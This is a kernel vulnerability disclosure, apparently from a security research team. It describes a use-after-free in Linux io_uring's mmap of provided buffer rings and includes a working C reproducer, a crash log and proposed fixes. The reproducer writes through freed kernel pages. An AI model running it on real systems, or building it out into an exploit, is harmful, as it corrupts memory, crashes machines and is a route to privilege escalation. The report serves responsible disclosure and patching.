Linux >=6.4: io_uring: page UAF via buffer ring mmap  
Since commit c56e022c0a27 ("io_uring: add support for user mapped provided  
buffer ring"), landed in Linux 6.4, io_uring makes it possible to allocate,  
mmap, and deallocate "buffer rings".  
A "buffer ring" can be allocated with  
io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated  
with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).  
It can be mapped into userspace using mmap() with offset  
IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM  
subsystem will treat the mapping as a set of opaque page frame numbers not  
associated with any corresponding pages; this implies that the calling code is  
responsible for ensuring that the mapped memory can not be freed before the  
userspace mapping is removed.  
However, there is no mechanism to ensure this in io_uring: It is possible to  
just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then  
free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free  
pages mapped into userspace, which is a fairly easily exploitable situation.  
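
The "..." in the mmap offset above selects which buffer group's ring gets mapped. The following is a minimal sketch of how that offset could be composed and decoded, assuming the encoding I believe the uapi header uses (IORING_OFF_PBUF_RING ORed with the buffer group ID shifted left by IORING_OFF_PBUF_SHIFT). The helper names are hypothetical, and the constants are redefined locally under SKETCH_ names so that the snippet compiles without recent kernel headers; check them against your <linux/io_uring.h>.

```c
#include <stdint.h>

/*
 * Local copies of the values that <linux/io_uring.h> is assumed to define as
 * IORING_OFF_PBUF_RING, IORING_OFF_PBUF_SHIFT and IORING_OFF_MMAP_MASK.
 */
#define SKETCH_OFF_PBUF_RING  0x80000000ULL
#define SKETCH_OFF_PBUF_SHIFT 16
#define SKETCH_OFF_MMAP_MASK  0xf8000000ULL

/* Hypothetical helper: mmap() offset for the buffer ring of group bgid. */
static uint64_t pbuf_ring_mmap_offset(uint16_t bgid)
{
    return SKETCH_OFF_PBUF_RING | ((uint64_t)bgid << SKETCH_OFF_PBUF_SHIFT);
}

/*
 * Hypothetical helper: recover the buffer group ID from such an offset by
 * masking off the region bits and undoing the shift.
 */
static uint16_t pbuf_ring_bgid_from_offset(uint64_t offset)
{
    return (uint16_t)((offset & ~SKETCH_OFF_MMAP_MASK) >> SKETCH_OFF_PBUF_SHIFT);
}
```

For bgid 0 the offset is just IORING_OFF_PBUF_RING, which is why the reproducer can pass the bare constant to mmap().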
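/*
 * Reproducer: register a buffer ring, mmap() it, unregister it, then keep
 * writing through the stale mapping.
 */
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/io_uring.h>

/* Evaluate a syscall-style expression and bail out if it returns -1. */
#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  /* Assumption: zeroed setup parameters are sufficient to hit the bug. */
  struct io_uring_params params = { 0 };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
  printf("uring_fd = %d\n", uring_fd);

  /* IOU_PBUF_RING_MMAP makes the kernel allocate the ring memory itself,
   * which is what allows it to be mmap()ed below. */
  struct io_uring_buf_reg reg = {
    .ring_entries = 1,
    .bgid = 0,
    .flags = IOU_PBUF_RING_MMAP
  };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));

  void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));
  printf("pbuf mapped at %p\n", pbuf_mapping);

  /* Free the ring's pages while they are still mapped into userspace. */
  struct io_uring_buf_reg unreg = { .bgid = 0 };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));

  /* Keep scribbling over the now-freed page. */
  while (1) {
    memset(pbuf_mapping, 0xaa, 0x1000);
  }
}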
When run on a system with the page table check debug options enabled, this  
will splat with the following error when __page_table_check_zero() detects  
that a page that's being freed is still mapped into userspace:  
------------[ cut here ]------------  
kernel BUG at mm/page_table_check.c:146!  
invalid opcode: 0000 [#1] PREEMPT SMP KASAN  
CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014  
RIP: 0010:__page_table_check_zero+0x136/0x150  
Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff  
RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202  
RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000  
RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4  
RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e  
R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000  
R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000  
FS: 00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000  
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0  
PKRU: 55555554  
Call Trace:  
RIP: 0033:0x7f745ef4bf59  
Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48  
RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab  
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59  
RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003  
RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000  
R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0  
R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000  
Modules linked in:  
---[ end trace 0000000000000000 ]---  
When run on a system without those options, this reproducer will randomly  
corrupt memory and will probably crash the machine on most runs.  
I tried it once; when I then used some other programs, I got a random  
kernel #GP fault.  
One way to fix this might be to add some mapping counter to  
`struct io_buffer_list`, and then:  
- increment that counter in io_uring_validate_mmap_request() for PBUF_RING  
- increment that counter in the vm_area_operations ->open() handler  
- decrement that counter in the vm_area_operations ->close() handler  
- refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?  
Or alternatively free the io_buffer_list when the counter drops to zero, and let  
the counter start at 1.  
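
The first variant above (refuse to unregister while mappings exist) can be sketched as a small userspace model. This is only an illustration of the counting scheme, not kernel code: `struct model_buffer_list`, the `model_*` function names, and the specific error codes are all hypothetical, and the locking that a real implementation would need is not modelled.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/*
 * Hypothetical stand-in for struct io_buffer_list; only the state needed to
 * illustrate the mapping counter is modelled.
 */
struct model_buffer_list {
    bool registered;        /* ring pages are currently allocated */
    unsigned int map_count; /* number of live userspace mappings */
};

/* mmap() request validation: take a reference for the new mapping. */
static int model_mmap(struct model_buffer_list *bl)
{
    if (!bl->registered)
        return -EINVAL;     /* placeholder error code */
    bl->map_count++;
    return 0;
}

/* ->open(): an existing VMA was duplicated or split. */
static void model_vma_open(struct model_buffer_list *bl)
{
    bl->map_count++;
}

/* ->close(): one VMA covering the ring went away. */
static void model_vma_close(struct model_buffer_list *bl)
{
    assert(bl->map_count > 0);
    bl->map_count--;
}

/* Unregister: refuse while any mapping is still live. */
static int model_unregister(struct model_buffer_list *bl)
{
    if (!bl->registered)
        return -ENOENT;     /* placeholder error code */
    if (bl->map_count != 0)
        return -EBUSY;      /* placeholder error code */
    bl->registered = false; /* only at this point would the pages be freed */
    return 0;
}
```

In this model, the reproducer's sequence (register, mmap, unregister) would fail at the unregister step with the placeholder -EBUSY until the last mapping is closed. The second variant would instead start the counter at 1, drop that initial reference on unregister, and free the pages from whichever path drops the counter to zero.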
(I'm not sure what the lifetime rules for other accesses to the io_buffer_list's  
memory are - it looks like most paths only access the io_buffer_list under some  
lock? Is the idea that the kernel actually accesses the buffer through userspace  
pointers, or something like that? I'll have to stare at this some more before I  
understand it...)  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2024-02-26.  
Found by: